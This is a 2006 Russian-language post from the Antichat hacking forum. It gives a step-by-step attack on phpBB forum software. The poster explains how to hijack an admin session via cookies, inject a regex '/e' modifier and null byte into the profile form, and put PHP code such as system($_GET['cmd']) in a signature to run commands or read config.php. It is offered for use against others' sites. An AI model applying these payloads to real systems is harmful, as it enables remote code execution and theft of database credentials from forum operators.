HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #17  
Старый 11.06.2006, 12:55
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию

Войдя под админом, при помощи заменой cookies идем в профиль.
Пришли? Дальше открываем исходный текст страницы и находим:
<form action="profile.php" method="post">
дописываем после profile.php такие строки ?signature_bbcode_uid=(.*)/e%00
ИТого должно получится
<form action="profile.php?signature_bbcode_uid=(.*)/e%00" method="post">

Обновляем страницу.......

И в подписе прописываем
[b:file_get_contents($_GET[bb])
В это место можно, естественно, вставить любой php-код, в том числе и system($_GET['cmd']).

Тыкаем СОхранить или ОТправить.
Идем по ссылке
http://www.someserver.ru/forum/profi...&bb=config.php

Смотри в подпись и БИНГО..... Содержимое config.php .
ДАльше делаем что хотим. (с) журнал ХАКЕР

Спасибо особенное Dr.Check'у.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите использовать багу сайта в качестве заливки шелла на сайт... PhoenixLion PHP 0 23.05.2006 12:45
Способы загрузки шелла через картнику 1ten0.0net1 Уязвимости CMS / форумов 16 27.03.2006 14:02
Сплойт к phpBB 2.0.12 ArdeOS Комментарии к видео 4 30.04.2005 09:27
Сплоит для заливки шелла в phpbb <= 2.0.12 Dro Уязвимости CMS / форумов 0 28.03.2005 18:02
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Уязвимости CMS / форумов 38 15.02.2005 16:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.